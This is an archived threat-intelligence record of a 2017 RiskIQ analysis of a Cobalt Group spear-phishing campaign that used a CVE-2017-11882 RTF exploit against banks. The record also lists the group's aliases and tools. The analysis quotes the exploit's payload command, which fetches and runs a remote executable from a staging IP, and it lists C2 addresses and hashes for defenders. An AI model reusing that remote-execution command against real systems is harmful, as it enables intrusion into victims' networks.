{
	"id": "9bd15da2-79fa-49d6-ae9c-f5746a56817a",
	"created_at": "2026-04-06T01:32:33.103578Z",
	"updated_at": "2026-04-10T03:35:12.460933Z",
	"deleted_at": null,
	"sha1_hash": "0c84c3b08e8e4b4dde6f2af77307e875b634eed6",
	"title": "Cobalt Group Gaffe Reveals All Targets in Attack on Financial Institutions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 519204,
	"plain_text": "Cobalt Group Gaffe Reveals All Targets in Attack on Financial Institutions\r\nBy Yonathan Klijnsma, November 28, 2017\r\nPublished: 2017-11-29 · Archived: 2026-04-06 01:25:34 UTC\r\nIn a recent spear-phishing campaign, the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike. However, they gave up much more information than they intended.\r\nOn Tuesday, November 21, a massive spear-phishing campaign began targeting individual employees at various financial institutions, mostly in Russia and Turkey. Purporting to provide info on changes to ‘SWIFT’ terms, the email contained a single attachment with no text in the body. It was an attempt by the Cobalt Group to gain a foothold in the networks of the targeted individuals’ organizations:\r\nhttps://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/\r\nPage 1 of 7\r\n\r\nFig-1 What the targets saw\r\nHowever, rather than putting their targets in BCC, the attackers put the entire list in the ‘TO’ field, allowing us to see their full list of intended targets. This isn’t the first time we’ve seen attackers make this error—back in March, an attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw.\r\nFig-2 As first seen on Twitter\r\nPayload Analysis\r\nThe attachment in the email is an RTF document abusing the recently disclosed exploit referred to as CVE-2017-11882, which is capable of leveraging Office 2007 to 2016 to execute code. The file ‘Swift changes.rtf’ uses this exploit to start a remote payload like so:\r\ncmd /c start \\\\138.68.234.128\\w\\w.exe \u0026AAAAAC\r\nThe payload is a stager for a tool known as ‘Cobalt Strike’ which, normally, is used in red teaming and pen testing engagements. The framework has gained some notoriety with adversaries, as it’s been used in multiple attacks against financial institutions in the past.\r\nThe Cobalt Strike beacon eventually connects to 104.144.207.207, which is the group’s command and control server for this attack. A very detailed analysis of the Cobalt Group’s activities and the way they operate can be found here: [ Cobalt strikes back: an evolving multinational threat to finance ].\r\nTargets\r\nWe won’t be disclosing the recipients of the email, but we will take a look at the targeting from a geographical perspective. The majority of targeting was focused on Turkey and Russia, but there was also a broad attempt at a compromise, targeting employees of one financial institution in eight different countries.\r\nOur list of countries in which employees were targeted includes the United States, Netherlands, Italy, Austria, Ukraine, Turkey, Russia, Jordan, Kuwait, and the Czech Republic:\r\nFig-3 Targeted countries highlighted in red\r\nOne thing we noticed when analyzing the targets of this campaign was that there were a lot of direct employee email addresses on the list, which makes their emails more convincing. More interesting is that the majority of these email addresses were found simply by Googling for email addresses for the financial institution, making it likely the attackers used open source intelligence to gather their list of targets, and no prior information was needed to get the addresses.\r\nFinding More Cobalt Strike\r\nAt RiskIQ, one of the datasets built from our large quantities of Internet data is a repository of SSL certificates and where we’ve seen them. What’s interesting about the case mentioned above is that the host is using a certificate seemingly shipped with Cobalt Strike by default. We can look up the certificate in RiskIQ Community via its SHA1 fingerprint: 6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c\r\nFig-4 SSL data inside RiskIQ Community\r\nWhat we find is that at least 100 different hosts seem to have been running an HTTPS server with the same certificate. If we jump over to our SIS API, we find that there have been 816(!) hosts running an HTTPS server with this certificate—all Cobalt Strike servers using a default certificate. To ensure our findings were correct, we confirmed them with previously reported threats that involved Cobalt Strike.\r\nFrom the data gathered through SIS, we can create some statistics on the setup of these Cobalt Strike servers. Port usage:\r\nPort  Hosts observed\r\n443   811\r\n465   4\r\n995   1\r\nBelow is the number of Cobalt Strike servers actively seen in our data from June 2015 until March 2016:\r\nFig-5 Instances of Cobalt Strike servers detected by RiskIQ\r\nOne thing to keep in mind is that Cobalt Strike is not always used by adversaries with malicious intent. Formally, Cobalt Strike is sold as a toolset for pen testing and red teaming engagements.\r\nWe’ve put all the hosts we’ve seen running Cobalt Strike with a default SSL certificate in a RiskIQ Community project. The SSL certificate is also included in this set: https://community.riskiq.com/projects/19bb67dd-2c51-7284-e5f2-7b79537e13d3\r\nIndicators of Compromise (IOCs)\r\nThe following IOCs are only related to the above spear-phishing campaign. The larger set of Cobalt Strike servers we identified can be found in the RiskIQ Community Project mentioned in the previous section.\r\nNetwork IOCs\r\nDomain  IP Address       Purpose\r\n–       138.68.234.128   Payload staging server\r\n–       104.144.207.207  Cobalt Strike server\r\nFilesystem IOCs\r\nFilename           MD5                               Purpose\r\nSwift changes.rtf  f360d41a0b42b129f7f0c29f98381416  CVE-2017-11882 exploit document downloading Cobalt Strike beacon\r\nw.exe              d46df9eacfe7ff75e098942e541d0f18  Cobalt Strike beacon\r\nLearn More\r\nRiskIQ gathers petabytes of data through crawling the entire internet and has amassed data sets that include SSL certificates and many more. SSL certificates can provide context by showing whether a domain or IP is legitimate based on its certificate, identify self-signed certificates versus those issued by a third-party authority, and identify IP clusters and additional certificates based on shared certificates. Click here for more information about how analysts can use SSL certificates to connect disparate malicious network infrastructure.\r\nTrack the IOCs from this attack, including those listed above, in the RiskIQ Community Project located here.\r\nSource: https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/"
	],
	"report_names": [
		"cobalt-strike"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51",
			"created_at": "2022-10-25T16:07:23.474746Z",
			"updated_at": "2026-04-10T02:00:04.623746Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"ATK 67",
				"Cobalt Gang",
				"Cobalt Spider",
				"G0080",
				"Gold Kingswood",
				"Mule Libra",
				"TAG-CR3"
			],
			"source_name": "ETDA:Cobalt Group",
			"tools": [
				"ATMRipper",
				"ATMSpitter",
				"Agentemis",
				"AmmyyRAT",
				"AtNow",
				"COOLPANTS",
				"CobInt",
				"Cobalt Strike",
				"CobaltStrike",
				"Cyst Downloader",
				"Fareit",
				"FlawedAmmyy",
				"Formbook",
				"Little Pig",
				"Metasploit Stager",
				"Mimikatz",
				"More_eggs",
				"NSIS",
				"Nullsoft Scriptable Install System",
				"Pony Loader",
				"Ripper ATM",
				"SDelete",
				"Siplog",
				"SoftPerfect Network Scanner",
				"SpicyOmelette",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Terra Loader",
				"ThreatKit",
				"VenomKit",
				"cobeacon",
				"win.xloader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242",
			"created_at": "2022-10-25T15:50:23.744036Z",
			"updated_at": "2026-04-10T02:00:05.294413Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"Cobalt Group",
				"GOLD KINGSWOOD",
				"Cobalt Gang",
				"Cobalt Spider"
			],
			"source_name": "MITRE:Cobalt Group",
			"tools": [
				"Mimikatz",
				"More_eggs",
				"SpicyOmelette",
				"SDelete",
				"Cobalt Strike",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439153,
	"ts_updated_at": 1775792112,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0c84c3b08e8e4b4dde6f2af77307e875b634eed6.pdf",
		"text": "https://archive.orkl.eu/0c84c3b08e8e4b4dde6f2af77307e875b634eed6.txt",
		"img": "https://archive.orkl.eu/0c84c3b08e8e4b4dde6f2af77307e875b634eed6.jpg"
	}
}